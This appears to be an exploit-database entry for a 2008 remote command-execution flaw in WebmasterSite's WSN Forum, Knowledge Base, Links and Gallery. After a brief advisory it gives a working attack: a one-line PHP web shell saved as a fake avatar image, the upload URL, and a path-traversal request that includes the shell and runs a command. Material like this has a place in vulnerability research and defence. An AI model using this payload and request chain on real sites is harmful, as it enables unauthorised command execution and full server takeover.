WebmasterSite (Multiple Products) - Remote Command Execution

Author: otmorozok428
type: webapps
platform: php
port: 
date_added: 2008-08-06 
date_updated: 2014-03-12 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/30572/info

Multiple WebmasterSite products are prone to a remote shell command-execution vulnerability because the applications fail to sufficiently sanitize user-supplied data.

Successfully exploiting this issue will allow an attacker to execute arbitrary commands in the context of the affected application.

This issue affects the following products:

WSN Forum 4.1.43
WSN Knowledge Base 4.1.36
WSN Links 4.1.44
WSN Gallery 4.1.30

Note that previous versions may also be vulnerable.

Avatar evil.jpg source:
<? system($_GET['cmd']); ?>

Enter to upload:
http://www.example.com/forum/profile.php?action=editprofile&id=[Your User ID]

See the avatar name at your profile.

Upload evil avatar and go to:
http://www.example.com/index.php?custom=yes&TID=../../attachments/avatars/[Avatar Name]&ext=jpg&cmd=ls -al